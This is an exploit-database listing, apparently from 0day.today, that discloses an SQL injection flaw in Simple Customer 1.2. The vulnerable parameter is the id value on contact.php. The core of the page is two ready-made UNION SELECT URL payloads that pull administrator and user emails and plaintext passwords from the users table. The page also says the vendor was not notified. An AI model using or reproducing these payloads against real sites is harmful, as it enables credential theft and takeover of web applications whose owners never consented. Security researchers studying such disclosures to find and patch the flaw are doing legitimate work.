[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Simple Customer 1.2 (contact.php id) SQL Injection Vulnerability

Author
t0pP8uZz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2895
Category
web applications
Date add
17-04-2008
Platform
unsorted
================================================================
Simple Customer 1.2 (contact.php id) SQL Injection Vulnerability
================================================================




--==+================================================================================+==--
--==+		    Simple Customer  1.2 SQL Injection Vulnerabilitys	             +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz
Discovered On: 18 April 2008
Script Download: http://www.simplecustomer.com/
DORK: N/A

Vendor Has Not Been Notified!


DESCRIPTION: 
Simple Customer is vulnerable due to MULTIPLE insecure mysql querys the querys take php $_GET variables and does
not do any sanitizing at all.

below are 2 sql injections, the first one will display admin user/pass



SQL Injection:

ADMIN: http://site.com/contact.php?id=1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(user_email,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/users/**/WHERE/**/user_level=1/*

USER:  http://site.com/contact.php?id=1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(user_email,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/users/**/LIMIT/**/0,1/*



NOTE/TIP: 
passwords in plain text




#  0day.today [2024-11-15]  #